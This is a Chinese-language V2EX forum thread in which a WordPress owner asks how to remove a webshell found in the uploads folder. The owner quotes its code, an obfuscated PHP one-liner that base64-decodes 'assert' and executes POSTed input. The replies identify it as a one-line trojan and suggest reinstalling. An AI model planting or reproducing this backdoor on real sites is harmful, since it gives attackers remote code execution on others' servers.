网站被挂马了 求解

2022-03-12 23:36:36 +08:00
 Kei001

今天突然收到阿里云发来的短信,说我的 WP 网站有后门( Webshell )文件待处理,打开一看,目录是 /wp-content/uploads/2022/03/1.php

好家伙,直接伪装了图片上传了了一个脚本文件,脚本文件如下:

<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>

现在一打开网站就是输出 phpinfo 信息,不太懂这段代码具体做了啥,如何清除这段木马?

1554 次点击
所在节点    问与答
2 条回复
eason1874
2022-03-12 23:50:05 +08:00
就是一句话木马,通过 assert 允许 POST 接收的代码

你连这都看不懂的话,排除也难了,搞不好 WP 其他文件也已经被植入了。重装吧,WP 文件全部替换成新下载的,主题和插件能替换的也替换掉,自己改过的那些就逐个文件排查
mineralsalt
2022-03-12 23:50:48 +08:00
base64 解码 : assert

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/839952

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX